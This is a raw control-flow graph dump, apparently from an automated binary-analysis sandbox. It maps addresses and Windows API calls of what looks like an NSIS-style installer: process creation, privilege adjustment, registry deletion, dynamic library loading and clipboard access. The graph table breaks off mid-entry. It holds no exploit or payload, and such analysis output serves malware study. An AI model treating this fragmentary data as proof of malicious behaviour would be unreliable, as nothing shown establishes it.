4837->4839 4840 404451 4838->4840 4841 40444b GetSysColor 4838->4841 4839->4838 4842 404462 4840->4842 4843 404458 SetBkColor 4840->4843 4841->4840 4842->4833 4844 404475 DeleteObject 4842->4844 4845 40447c CreateBrushIndirect 4842->4845 4843->4842 4844->4845 4845->4833 5587 401f06 5588 402c41 17 API calls 5587->5588 5589 401f0c 5588->5589 5590 405450 24 API calls 5589->5590 5591 401f16 5590->5591 5592 4059d1 2 API calls 5591->5592 5593 401f1c 5592->5593 5594 406873 5 API calls 5593->5594 5595 40288b 5593->5595 5598 401f3f CloseHandle 5593->5598 5597 401f31 5594->5597 5597->5598 5600 40632f wsprintfW 5597->5600 5598->5595 5600->5598 5601 6eab166d 5602 6eab1516 GlobalFree 5601->5602 5604 6eab1685 5602->5604 5603 6eab16cb GlobalFree 5604->5603 5605 6eab16a0 5604->5605 5606 6eab16b7 VirtualFree 5604->5606 5605->5603 5606->5603 5607 404809 5608 404819 5607->5608 5609 40483f 5607->5609 5610 40435f 18 API calls 5608->5610 5611 4043c6 8 API calls 5609->5611 5612 404826 SetDlgItemTextW 5610->5612 5613 40484b 5611->5613 5612->5609 5614 6eab10e1 5618 6eab1111 5614->5618 5615 6eab11d8 GlobalFree 5616 6eab12ba 2 API calls 5616->5618 5617 6eab11d3 5617->5615 5618->5615 5618->5616 5618->5617 5619 6eab1164 GlobalAlloc 5618->5619 5620 6eab11f8 GlobalFree 5618->5620 5621 6eab1272 2 API calls 5618->5621 5622 6eab12e1 lstrcpyW 5618->5622 5623 6eab11c4 GlobalFree 5618->5623 5619->5618 5620->5618 5621->5623 5622->5618 5623->5618 5624 40190c 5625 401943 5624->5625 5626 402c41 17 API calls 5625->5626 5627 401948 5626->5627 5628 405afa 67 API calls 5627->5628 5629 401951 5628->5629 5630 40230c 5631 402314 5630->5631 5632 40231a 5630->5632 5633 402c41 17 API calls 5631->5633 5634 402c41 17 API calls 5632->5634 5635 402328 5632->5635 5633->5632 5634->5635 5636 402c41 17 API calls 5635->5636 5638 402336 5635->5638 5636->5638 5637 402c41 17 API calls 5639 40233f WritePrivateProfileStringW 5637->5639 5638->5637 5640 401f8c 5641 402c41 17 API calls 5640->5641 5642 401f93 5641->5642 5643 4067c2 5 API calls 5642->5643 5644 401fa2 5643->5644 5645 402026 5644->5645 5646 401fbe GlobalAlloc 5644->5646 5646->5645 5647 401fd2 5646->5647 5648 4067c2 5 API calls 5647->5648 5649 401fd9 5648->5649 5650 4067c2 5 API calls 5649->5650 5651 401fe3 5650->5651 5651->5645 5655 40632f wsprintfW 5651->5655 5653 402018 5656 40632f wsprintfW 5653->5656 5655->5653 5656->5645 4947 40238e 4948 4023c1 4947->4948 4949 402396 4947->4949 4950 402c41 17 API calls 4948->4950 4951 402c81 17 API calls 4949->4951 4952 4023c8 4950->4952 4953 40239d 4951->4953 4959 402cff 4952->4959 4955 4023a7 4953->4955 4957 4023d5 4953->4957 4956 402c41 17 API calls 4955->4956 4958 4023ae RegDeleteValueW RegCloseKey 4956->4958 4958->4957 4960 402d0c 4959->4960 4961 402d13 4959->4961 4960->4957 4961->4960 4963 402d44 4961->4963 4964 406255 RegOpenKeyExW 4963->4964 4965 402d72 4964->4965 4966 402d76 4965->4966 4967 402dec 4965->4967 4968 402d98 RegEnumKeyW 4966->4968 4969 402daf RegCloseKey 4966->4969 4970 402dd0 RegCloseKey 4966->4970 4972 402d44 6 API calls 4966->4972 4967->4960 4968->4966 4968->4969 4971 4067c2 5 API calls 4969->4971 4970->4967 4973 402dbf 4971->4973 4972->4966 4974 402de0 RegDeleteKeyW 4973->4974 4975 402dc3 4973->4975 4974->4967 4975->4967 5657 40190f 5658 402c41 17 API calls 5657->5658 5659 401916 5658->5659 5660 405a4e MessageBoxIndirectW 5659->5660 5661 40191f 5660->5661 5662 40558f 5663 4055b0 GetDlgItem GetDlgItem GetDlgItem 5662->5663 5664 405739 5662->5664 5707 404394 SendMessageW 5663->5707 5666 405742 GetDlgItem CreateThread CloseHandle 5664->5666 5667 40576a 5664->5667 5666->5667 5669 405795 5667->5669 5671 405781 ShowWindow ShowWindow 5667->5671 5672 4057ba 5667->5672 5668 405620 5676 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5668->5676 5670 4057f5 5669->5670 5673 4057a9 5669->5673 5674 4057cf ShowWindow 5669->5674 5670->5672 5683 405803 SendMessageW 5670->5683 5709 404394 SendMessageW 5671->5709 5675 4043c6 8 API calls 5672->5675 5678 404338 SendMessageW 5673->5678 5679 4057e1 5674->5679 5680 4057ef 5674->5680 5688 4057c8 5675->5688 5681 405695 5676->5681 5682 405679 SendMessageW SendMessageW 5676->5682 5678->5672 5684 405450 24 API calls 5679->5684 5685 404338 SendMessageW 5680->5685 5686 4056a8 5681->5686 5687 40569a SendMessageW 5681->5687 5682->5681 5683->5688 5689 40581c CreatePopupMenu 5683->5689 5684->5680 5685->5670 5691 40435f 18 API calls 5686->5691 5687->5686 5690 40640a 17 API calls 5689->5690 5692 40582c AppendMenuW 5690->5692 5693 4056b8 5691->5693 5694 405849 GetWindowRect 5692->5694 5695 40585c TrackPopupMenu 5692->5695 5696 4056c1 ShowWindow 5693->5696 5697 4056f5 GetDlgItem SendMessageW 5693->5697 5694->5695 5695->5688 5698 405877 5695->5698 5699 4056e4 5696->5699 5700 4056d7 ShowWindow 5696->5700 5697->5688 5701 40571c SendMessageW SendMessageW 5697->5701 5702 405893 SendMessageW 5698->5702 5708 404394 SendMessageW 5699->5708 5700->5699 5701->5688 5702->5702 5703 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5702->5703 5705 4058d5 SendMessageW 5703->5705 5705->5705 5706 4058fe GlobalUnlock SetClipboardData CloseClipboard 5705->5706 5706->5688 5707->5668 5708->5697 5709->5669 5710 401491 5711 405450 24 API calls 5710->5711 5712 401498 5711->5712 5720 401d14 5721 402c1f 17 API calls 5720->5721 5722 401d1b 5721->5722 5723 402c1f 17 API calls 5722->5723 5724 401d27 GetDlgItem 5723->5724 5725 402592 5724->5725 5726 402994 5727 402c1f 17 API calls 5726->5727 5728 4029ae 5727->5728 5729 4029d5 5728->5729 5730 4029ee 5728->5730 5735 40288b 5728->5735 5731 4029da 5729->5731 5732 4029eb 5729->5732 5733 402a08 5730->5733 5734 4029f8 5730->5734 5740 4063e8 lstrcpynW 5731->5740 5732->5735 5741 40632f wsprintfW 5732->5741 5737 40640a 17 API calls 5733->5737 5736 402c1f 17 API calls 5734->5736 5736->5732 5737->5732 5740->5735 5741->5735 5742 404495 lstrcpynW lstrlenW 5743 6eab22fd 5744 6eab2367 5743->5744 5745 6eab2372 GlobalAlloc 5744->5745 5746 6eab2391 5744->5746 5745->5744 5747 403a96 5748 403aa1 5747->5748 5749 403aa5 5748->5749 5750 403aa8 GlobalAlloc 5748->5750 5750->5749 5751 402598 5752 4025c7 5751->5752 5753 4025ac 5751->5753 5755 4025fb 5752->5755 5756 4025cc 5752->5756 5754 402c1f 17 API calls 5753->5754 5763 4025b3 5754->5763 5758 402c41 17 API calls 5755->5758 5757 402c41 17 API calls 5756->5757 5759 4025d3 WideCharToMultiByte lstrlenA 5757->5759 5760 402602 lstrlenW 5758->5760 5759->5763 5760->5763 5761 402645 5762 40262f 5762->5761 5764 405f90 WriteFile 5762->5764 5763->5761 5763->5762 5765 405fbf 5 API calls 5763->5765 5764->5761 5765->5762 5766 40451e 5768 404536 5766->5768 5770 404650 5766->5770 5767 4046ba 5769 404784 5767->5769 5771 4046c4 GetDlgItem 5767->5771 5772 40435f 18 API calls 5768->5772 5777 4043c6 8 API calls 5769->5777 5770->5767 5770->5769 5775 40468b GetDlgItem SendMessageW 5770->5775 5773 404745 5771->5773 5774 4046de 5771->5774 5776 40459d 5772->5776 5773->5769 5779 404757 5773->5779 5774->5773 5778 404704 SendMessageW LoadCursorW SetCursor 5774->5778 5799 404381 EnableWindow 5775->5799 5781 40435f 18 API calls 5776->5781 5782 40477f 5777->5782 5800 4047cd 5778->5800 5784 40476d 5779->5784 5785 40475d SendMessageW 5779->5785 5787 4045aa CheckDlgButton 5781->5787 5784->5782 5789 404773 SendMessageW 5784->5789 5785->5784 5786 4046b5 5790 4047a9 SendMessageW 5786->5790 5797 404381 EnableWindow 5787->5797 5789->5782 5790->5767 5792 4045c8 GetDlgItem 5798 404394 SendMessageW 5792->5798 5794 4045de SendMessageW 5795 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5794->5795 5796 4045fb GetSysColor 5794->5796 5795->5782 5796->5795 5797->5792 5798->5794 5799->5786 5803 405a14 ShellExecuteExW 5800->5803 5802 404733 LoadCursorW SetCursor 5802->5773 5803->5802 5804 40149e 5805 4022f7 5804->5805 5806 4014ac PostQuitMessage 5804->5806 5806->5805 5807 401c1f 5808 402c1f 17 API calls 5807->5808 5809 401c26 5808->5809 5810 402c1f 17 API calls 5809->5810 5811 401c33 5810->5811 5812 402c41 17 API calls 5811->5812 5813 401c48 5811->5813 5812->5813 5814 401c58 5813->5814 5815 402c41 17 API calls 5813->5815 5816 401c63 5814->5816 5817 401caf 5814->5817 5815->5814 5819 402c1f 17 API calls 5816->5819 5818 402c41 17 API calls 5817->5818 5820 401cb4 5818->5820 5821 401c68 5819->5821 5822 402c41 17 API calls 5820->5822 5823 402c1f 17 API calls 5821->5823 5824 401cbd FindWindowExW 5822->5824 5825 401c74 5823->5825 5828 401cdf 5824->5828 5826 401c81 SendMessageTimeoutW 5825->5826 5827 401c9f SendMessageW 5825->5827 5826->5828 5827->5828 5829 402821 5830 402827 5829->5830 5831 402ac5 5830->5831 5832 40282f FindClose 5830->5832 5832->5831 5833 4015a3 5834 402c41 17 API calls 5833->5834 5835 4015aa SetFileAttributesW 5834->5835 5836 4015bc 5835->5836 4508 4034a5 SetErrorMode GetVersion 4509 4034e4 4508->4509 4512 4034ea 4508->4512 4510 4067c2 5 API calls 4509->4510 4510->4512 4511 406752 3 API calls 4513 403500 lstrlenA 4511->4513 4512->4511 4513->4512 4514 403510 4513->4514 4515 4067c2 5 API calls 4514->4515 4516 403517 4515->4516 4517 4067c2 5 API calls 4516->4517 4518 40351e 4517->4518 4519 4067c2 5 API calls 4518->4519 4520 40352a #17 OleInitialize SHGetFileInfoW 4519->4520 4598 4063e8 lstrcpynW 4520->4598 4523 403576 GetCommandLineW 4599 4063e8 lstrcpynW 4523->4599 4525 403588 4526 405cea CharNextW 4525->4526 4527 4035ad CharNextW 4526->4527 4528 4036d7 GetTempPathW 4527->4528 4536 4035c6 4527->4536 4600 403474 4528->4600 4530 4036ef 4531 4036f3 GetWindowsDirectoryW lstrcatW 4530->4531 4532 403749 DeleteFileW 4530->4532 4533 403474 12 API calls 4531->4533 4610 402f30 GetTickCount GetModuleFileNameW 4532->4610 4537 40370f 4533->4537 4534 405cea CharNextW 4534->4536 4536->4534 4541 4036c2 4536->4541 4543 4036c0 4536->4543 4537->4532 4539 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4537->4539 4538 40375d 4544 403800 4538->4544 4546 405cea CharNextW 4538->4546 4594 403810 4538->4594 4542 403474 12 API calls 4539->4542 4696 4063e8 lstrcpynW 4541->4696 4549 403741 4542->4549 4543->4528 4640 403ad8 4544->4640 4561 40377c 4546->4561 4549->4532 4549->4594 4550 40394a 4553 403952 GetCurrentProcess OpenProcessToken 4550->4553 4554 4039ce ExitProcess 4550->4554 4551 40382a 4708 405a4e 4551->4708 4559 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4553->4559 4560 40399e 4553->4560 4556 403840 4563 4059b9 5 API calls 4556->4563 4557 4037da 4562 405dc5 18 API calls 4557->4562 4559->4560 4564 4067c2 5 API calls 4560->4564 4561->4556 4561->4557 4565 4037e6 4562->4565 4566 403845 lstrcatW 4563->4566 4567 4039a5 4564->4567 4565->4594 4697 4063e8 lstrcpynW 4565->4697 4569 403861 lstrcatW lstrcmpiW 4566->4569 4570 403856 lstrcatW 4566->4570 4568 4039ba ExitWindowsEx 4567->4568 4571 4039c7 4567->4571 4568->4554 4568->4571 4573 40387d 4569->4573 4569->4594 4570->4569 4574 40140b 2 API calls 4571->4574 4576 403882 4573->4576 4577 403889 4573->4577 4574->4554 4575 4037f5 4698 4063e8 lstrcpynW 4575->4698 4578 40591f 4 API calls 4576->4578 4579 40599c 2 API calls 4577->4579 4581 403887 4578->4581 4582 40388e SetCurrentDirectoryW 4579->4582 4581->4582 4583 4038a9 4582->4583 4584 40389e 4582->4584 4713 4063e8 lstrcpynW 4583->4713 4712 4063e8 lstrcpynW 4584->4712 4587 40640a 17 API calls 4588 4038e8 DeleteFileW 4587->4588 4589 4038f5 CopyFileW 4588->4589 4591 4038b7 4588->4591 4589->4591 4590 40393e 4592 4061ae 36 API calls 4590->4592 4591->4587 4591->4590 4593 4061ae 36 API calls 4591->4593 4595 40640a 17 API calls 4591->4595 4597 403929 CloseHandle 4591->4597 4714 4059d1 CreateProcessW 4591->4714 4592->4594 4593->4591 4699 4039e6 4594->4699 4595->4591 4597->4591 4598->4523 4599->4525 4601 40667c 5 API calls 4600->4601 4603 403480 4601->4603 4602 40348a 4602->4530 4603->4602 4604 405cbd 3 API calls 4603->4604 4605 403492 4604->4605 4606 40599c 2 API calls 4605->4606 4607 403498 4606->4607 4717 405f0d 4607->4717 4721 405ede GetFileAttributesW CreateFileW 4610->4721 4612 402f73 4639 402f80 4612->4639 4722 4063e8 lstrcpynW 4612->4722 4614 402f96 4615 405d09 2 API calls 4614->4615 4616 402f9c 4615->4616 4723 4063e8 lstrcpynW 4616->4723 4618 402fa7 GetFileSize 4619 4030a8 4618->4619 4620 402fbe 4618->4620 4621 402e8e 32 API calls 4619->4621 4620->4619 4622 403447 ReadFile 4620->4622 4625 403143 4620->4625 4631 402e8e 32 API calls 4620->4631 4620->4639 4623 4030af 4621->4623 4622->4620 4624 4030eb GlobalAlloc 4623->4624 4623->4639 4725 40345d SetFilePointer 4623->4725 4629 403102 4624->4629 4627 402e8e 32 API calls 4625->4627 4627->4639 4628 4030cc 4630 403447 ReadFile 4628->4630 4632 405f0d 2 API calls 4629->4632 4633 4030d7 4630->4633 4631->4620 4634 403113 CreateFileW 4632->4634 4633->4624 4633->4639 4635 40314d 4634->4635 4634->4639 4724 40345d SetFilePointer 4635->4724 4637 40315b 4638 4031d6 44 API calls 4637->4638 4638->4639 4639->4538 4641 4067c2 5 API calls 4640->4641 4642 403aec 4641->4642 4643 403af2 4642->4643 4644 403b04 4642->4644 4734 40632f wsprintfW 4643->4734 4645 4062b6 3 API calls 4644->4645 4646 403b34 4645->4646 4648 403b53 lstrcatW 4646->4648 4649 4062b6 3 API calls 4646->4649 4650 403b02 4648->4650 4649->4648 4726 403dae 4650->4726 4653 405dc5 18 API calls 4654 403b85 4653->4654 4655 403c19 4654->4655 4657 4062b6 3 API calls 4654->4657 4656 405dc5 18 API calls 4655->4656 4659 403c1f 4656->4659 4658 403bb7 4657->4658 4658->4655 4666 403bd8 lstrlenW 4658->4666 4670 405cea CharNextW 4658->4670 4660 403c2f LoadImageW 4659->4660 4661 40640a 17 API calls 4659->4661 4662 403cd5 4660->4662 4663 403c56 RegisterClassW 4660->4663 4661->4660 4665 40140b 2 API calls 4662->4665 4664 403c8c SystemParametersInfoW CreateWindowExW 4663->4664 4695 403cdf 4663->4695 4664->4662 4669 403cdb 4665->4669 4667 403be6 lstrcmpiW 4666->4667 4668 403c0c 4666->4668 4667->4668 4671 403bf6 GetFileAttributesW 4667->4671 4672 405cbd 3 API calls 4668->4672 4675 403dae 18 API calls 4669->4675 4669->4695 4673 403bd5 4670->4673 4674 403c02 4671->4674 4676 403c12 4672->4676 4673->4666 4674->4668 4677 405d09 2 API calls 4674->4677 4678 403cec 4675->4678 4735 4063e8 lstrcpynW 4676->4735 4677->4668 4680 403cf8 ShowWindow 4678->4680 4681 403d7b 4678->4681 4683 406752 3 API calls 4680->4683 4736 405523 OleInitialize 4681->4736 4685 403d10 4683->4685 4684 403d81 4686 403d85 4684->4686 4687 403d9d 4684->4687 4688 403d1e GetClassInfoW 4685->4688 4690 406752 3 API calls 4685->4690 4694 40140b 2 API calls 4686->4694 4686->4695 4689 40140b 2 API calls 4687->4689 4691 403d32 GetClassInfoW RegisterClassW 4688->4691 4692 403d48 DialogBoxParamW 4688->4692 4689->4695 4690->4688 4691->4692 4693 40140b 2 API calls 4692->4693 4693->4695 4694->4695 4695->4594 4696->4543 4697->4575 4698->4544 4700 403a01 4699->4700 4701 4039f7 CloseHandle 4699->4701 4702 403a15 4700->4702 4703 403a0b CloseHandle 4700->4703 4701->4700 4747 403a43 4702->4747 4703->4702 4706 405afa 67 API calls 4707 403819 OleUninitialize 4706->4707 4707->4550 4707->4551 4709 405a63 4708->4709 4710 403838 ExitProcess 4709->4710 4711 405a77 MessageBoxIndirectW 4709->4711 4711->4710 4712->4583 4713->4591 4715 405a10 4714->4715 4716 405a04 CloseHandle 4714->4716 4715->4591 4716->4715 4718 405f1a GetTickCount GetTempFileNameW 4717->4718 4719 405f50 4718->4719 4720 4034a3 4718->4720 4719->4718 4719->4720 4720->4530 4721->4612 4722->4614 4723->4618 4724->4637 4725->4628 4727 403dc2 4726->4727 4743 40632f wsprintfW 4727->4743 4729 403e33 4744 403e67 4729->4744 4731 403b63 4731->4653 4732 403e38 4732->4731 4733 40640a 17 API calls 4732->4733 4733->4732 4734->4650 4735->4655 4737 4043ab SendMessageW 4736->4737 4741 405546 4737->4741 4738 40556d 4739 4043ab SendMessageW 4738->4739 4740 40557f OleUninitialize 4739->4740 4740->4684 4741->4738 4742 401389 2 API calls 4741->4742 4742->4741 4743->4729 4745 40640a 17 API calls 4744->4745 4746 403e75 SetWindowTextW 4745->4746 4746->4732 4748 403a51 4747->4748 4749 403a1a 4748->4749 4750 403a56 FreeLibrary GlobalFree 4748->4750 4749->4706 4750->4749 4750->4750 5837 404ba6 5838 404bd2 5837->5838 5839 404bb6 5837->5839 5840 404c05 5838->5840 5841 404bd8 SHGetPathFromIDListW 5838->5841 5848 405a32 GetDlgItemTextW 5839->5848 5843 404bef SendMessageW 5841->5843 5844 404be8 5841->5844 5843->5840 5846 40140b 2 API calls 5844->5846 5845 404bc3 SendMessageW 5845->5838 5846->5843 5848->5845 5870 401a30 5871 402c41 17 API calls 5870->5871 5872 401a39 ExpandEnvironmentStringsW 5871->5872 5873 401a4d 5872->5873 5875 401a60 5872->5875 5874 401a52 lstrcmpW 5873->5874 5873->5875 5874->5875 5027 402032 5028 402044 5027->5028 5029 4020f6 5027->5029 5030 402c41 17 API calls 5028->5030 5031 401423 24 API calls 5029->5031 5032 40204b 5030->5032 5037 402250 5031->5037 5033 402c41 17 API calls 5032->5033 5034 402054 5033->5034 5035 40206a LoadLibraryExW 5034->5035 5036 40205c GetModuleHandleW 5034->5036 5035->5029 5038 40207b 5035->5038 5036->5035 5036->5038 5050 406831 WideCharToMultiByte 5038->5050 5041 4020c5 5045 405450 24 API calls 5041->5045 5042 40208c 5043 402094 5042->5043 5044 4020ab 5042->5044 5046 401423 24 API calls 5043->5046 5053 6eab1777 5044->5053 5047 40209c 5045->5047 5046->5047 5047->5037 5048 4020e8 FreeLibrary 5047->5048 5048->5037 5051 40685b GetProcAddress 5050->5051 5052 402086 5050->5052 5051->5052 5052->5041 5052->5042 5054 6eab17aa 5053->5054 5095 6eab1b5f 5054->5095 5056 6eab17b1 5057 6eab18d6 5056->5057 5058 6eab17c9 5056->5058 5059 6eab17c2 5056->5059 5057->5047 5129 6eab2394 5058->5129 5145 6eab2352 5059->5145 5064 6eab180f 5158 6eab2569 5064->5158 5065 6eab182d 5070 6eab187e 5065->5070 5071 6eab1833 5065->5071 5066 6eab17f8 5079 6eab17ee 5066->5079 5155 6eab2d37 5066->5155 5068 6eab17e5 5068->5079 5139 6eab2aac 5068->5139 5069 6eab17df 5069->5068 5075 6eab17f0 5069->5075 5073 6eab2569 10 API calls 5070->5073 5177 6eab15c6 5071->5177 5080 6eab186f 5073->5080 5074 6eab1815 5169 6eab15b4 5074->5169 5149 6eab2724 5075->5149 5079->5064 5079->5065 5086 6eab18c5 5080->5086 5183 6eab252c 5080->5183 5083 6eab2569 10 API calls 5083->5080 5085 6eab17f6 5085->5079 5086->5057 5088 6eab18cf GlobalFree 5086->5088 5088->5057 5092 6eab18b1 5092->5086 5187 6eab153d wsprintfW 5092->5187 5093 6eab18aa FreeLibrary 5093->5092 5190 6eab121b GlobalAlloc 5095->5190 5097 6eab1b83 5191 6eab121b GlobalAlloc 5097->5191 5099 6eab1da9 GlobalFree GlobalFree GlobalFree 5100 6eab1dc6 5099->5100 5116 6eab1e10 5099->5116 5102 6eab2192 5100->5102 5108 6eab1ddb 5100->5108 5100->5116 5101 6eab1c64 GlobalAlloc 5124 6eab1b8e 5101->5124 5103 6eab21b4 GetModuleHandleW 5102->5103 5102->5116 5104 6eab21da 5103->5104 5105 6eab21c5 LoadLibraryW 5103->5105 5198 6eab161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5104->5198 5105->5104 5105->5116 5106 6eab1caf lstrcpyW 5110 6eab1cb9 lstrcpyW 5106->5110 5107 6eab1ccd GlobalFree 5107->5124 5108->5116 5194 6eab122c 5108->5194 5110->5124 5111 6eab222c 5114 6eab2239 lstrlenW 5111->5114 5111->5116 5112 6eab20ec 5112->5116 5122 6eab2134 lstrcpyW 5112->5122 5199 6eab161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5114->5199 5115 6eab2064 5197 6eab121b GlobalAlloc 5115->5197 5116->5056 5117 6eab21ec 5117->5111 5127 6eab2216 GetProcAddress 5117->5127 5120 6eab1d0b 5120->5124 5192 6eab158f GlobalSize GlobalAlloc 5120->5192 5121 6eab1fa5 GlobalFree 5121->5124 5122->5116 5123 6eab2253 5123->5116 5124->5099 5124->5101 5124->5106 5124->5107 5124->5110 5124->5112 5124->5115 5124->5116 5124->5120 5124->5121 5126 6eab122c 2 API calls 5124->5126 5126->5124 5127->5111 5128 6eab206d 5128->5056 5136 6eab23ac 5129->5136 5130 6eab122c GlobalAlloc lstrcpynW 5130->5136 5132 6eab24d5 GlobalFree 5135 6eab17cf 5132->5135 5132->5136 5133 6eab247f GlobalAlloc CLSIDFromString 5133->5132 5134 6eab2454 GlobalAlloc WideCharToMultiByte 5134->5132 5135->5066 5135->5069 5135->5079 5136->5130 5136->5132 5136->5133 5136->5134 5138 6eab249e 5136->5138 5201 6eab12ba 5136->5201 5138->5132 5205 6eab26b8 5138->5205 5141 6eab2abe 5139->5141 5140 6eab2b63 EnumWindows 5144 6eab2b81 5140->5144 5141->5140 5143 6eab2c4d 5143->5079 5208 6eab2a56 5144->5208 5146 6eab2367 5145->5146 5147 6eab2372 GlobalAlloc 5146->5147 5148 6eab17c8 5146->5148 5147->5146 5148->5058 5153 6eab2754 5149->5153 5150 6eab27ef GlobalAlloc 5154 6eab2812 5150->5154 5151 6eab2802 5152 6eab2808 GlobalSize 5151->5152 5151->5154 5152->5154 5153->5150 5153->5151 5154->5085 5156 6eab2d42 5155->5156 5157 6eab2d82 GlobalFree 5156->5157 5212 6eab121b GlobalAlloc 5158->5212 5160 6eab261f lstrcpynW 5163 6eab2573 5160->5163 5161 6eab260e StringFromGUID2 5161->5163 5162 6eab25ec MultiByteToWideChar 5162->5163 5163->5160 5163->5161 5163->5162 5164 6eab2632 wsprintfW 5163->5164 5165 6eab2656 GlobalFree 5163->5165 5166 6eab268b GlobalFree 5163->5166 5167 6eab1272 2 API calls 5163->5167 5213 6eab12e1 5163->5213 5164->5163 5165->5163 5166->5074 5167->5163 5217 6eab121b GlobalAlloc 5169->5217 5171 6eab15b9 5172 6eab15c6 2 API calls 5171->5172 5173 6eab15c3 5172->5173 5174 6eab1272 5173->5174 5175 6eab127b GlobalAlloc lstrcpynW 5174->5175 5176 6eab12b5 GlobalFree 5174->5176 5175->5176 5176->5080 5178 6eab15ff lstrcpyW 5177->5178 5179 6eab15d2 wsprintfW 5177->5179 5182 6eab1618 5178->5182 5179->5182 5182->5083 5184 6eab253a 5183->5184 5185 6eab1891 5183->5185 5184->5185 5186 6eab2556 GlobalFree 5184->5186 5185->5092 5185->5093 5186->5184 5188 6eab1272 2 API calls 5187->5188 5189 6eab155e 5188->5189 5189->5086 5190->5097 5191->5124 5193 6eab15ad 5192->5193 5193->5120 5200 6eab121b GlobalAlloc 5194->5200 5196 6eab123b lstrcpynW 5196->5116 5197->5128 5198->5117 5199->5123 5200->5196 5202 6eab12c1 5201->5202 5203 6eab122c 2 API calls 5202->5203 5204 6eab12df 5203->5204 5204->5136 5206 6eab271c 5205->5206 5207 6eab26c6 VirtualAlloc 5205->5207 5206->5138 5207->5206 5209 6eab2a61 5208->5209 5210 6eab2a71 5209->5210 5211 6eab2a66 GetLastError 5209->5211 5210->5143 5211->5210 5212->5163 5214 6eab12ea 5213->5214 5215 6eab130c 5213->5215 5214->5215 5216 6eab12f0 lstrcpyW 5214->5216 5215->5163 5216->5215 5217->5171 5876 6eab18d9 5877 6eab18fc 5876->5877 5878 6eab1943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5877->5878 5879 6eab1931 GlobalFree 5877->5879 5880 6eab1272 2 API calls 5878->5880 5879->5878 5881 6eab1ace GlobalFree GlobalFree 5880->5881 5887 6eab1058 5889 6eab1074 5887->5889 5888 6eab10dd 5889->5888 5890 6eab1516 GlobalFree 5889->5890 5891 6eab1092 5889->5891 5890->5891 5892 6eab1516 GlobalFree 5891->5892 5893 6eab10a2 5892->5893 5894 6eab10a9 GlobalSize 5893->5894 5895 6eab10b2 5893->5895 5894->5895 5896 6eab10c7 5895->5896 5897 6eab10b6 GlobalAlloc 5895->5897 5899 6eab10d2 GlobalFree 5896->5899 5898 6eab153d 3 API calls 5897->5898 5898->5896 5899->5888 5900 402a35 5901 402c1f 17 API calls 5900->5901 5902 402a3b 5901->5902 5903 402a72 5902->5903 5905 40288b 5902->5905 5906 402a4d 5902->5906 5904 40640a 17 API calls 5903->5904 5903->5905 5904->5905 5906->5905 5908 40632f wsprintfW 5906->5908 5908->5905 5909 401735 5910 402c41 17 API calls 5909->5910 5911 40173c SearchPathW 5910->5911 5912 4029e6 5911->5912 5913 401757 5911->5913 5913->5912 5915 4063e8 lstrcpynW 5913->5915 5915->5912 5916 4014b8 5917 4014be 5916->5917 5918 401389 2 API calls 5917->5918 5919 4014c6 5918->5919 5920 401db9 GetDC 5921 402c1f 17 API calls 5920->5921 5922 401dcb GetDeviceCaps MulDiv ReleaseDC 5921->5922 5923 402c1f 17 API calls 5922->5923 5924 401dfc 5923->5924 5925 40640a 17 API calls 5924->5925 5926 401e39 CreateFontIndirectW 5925->5926 5927 402592 5926->5927 5928 40283b 5929 402843 5928->5929 5930 402847 FindNextFileW 5929->5930 5931 402859 5929->5931 5930->5931 5932 4029e6 5931->5932 5934 4063e8 lstrcpynW 5931->5934 5934->5932 5935 6eab2c57 5936 6eab2c6f 5935->5936 5937 6eab158f 2 API calls 5936->5937 5938 6eab2c8a 5937->5938 5946 402abe InvalidateRect 5947 402ac5 5946->5947 5948 6eab16d4 5949 6eab1703 5948->5949 5950 6eab1b5f 22 API calls 5949->5950 5951 6eab170a 5950->5951 5952 6eab171d 5951->5952 5953 6eab1711 5951->5953 5955 6eab1727 5952->5955 5956 6eab1744 5952->5956 5954 6eab1272 2 API calls 5953->5954 5965 6eab171b 5954->5965 5959 6eab153d 3 API calls 5955->5959 5957 6eab174a 5956->5957 5958 6eab176e 5956->5958 5961 6eab15b4 3 API calls 5957->5961 5962 6eab153d 3 API calls 5958->5962 5960 6eab172c 5959->5960 5963 6eab15b4 3 API calls 5960->5963 5964 6eab174f 5961->5964 5962->5965 5966 6eab1732 5963->5966 5967 6eab1272 2 API calls 5964->5967 5968 6eab1272 2 API calls 5966->5968 5969 6eab1755 GlobalFree 5967->5969 5970 6eab1738 GlobalFree 5968->5970 5969->5965 5971 6eab1769 GlobalFree 5969->5971 5970->5965 5971->5965

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 3 4034fa-40350e call 406752 lstrlenA 2->3 9 403510-40352c call 4067c2 * 3 3->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 22 403536 17->22 22->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 31->34 35 4035db-4035df 31->35 32->31 32->32 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 54 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->54 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 45 403601 43->45 46 4035fc-4035ff 43->46 47 403661-40369b 44->47 48 403646-40364b 44->48 45->44 46->44 46->45 47->38 53 40369d-4036a1 47->53 48->47 52 40364d-403655 48->52 60 403657-40365a 52->60 61 40365c 52->61 53->38 62 4036c2-4036d0 call 4063e8 53->62 54->37 54->57 55->56 56->28 64 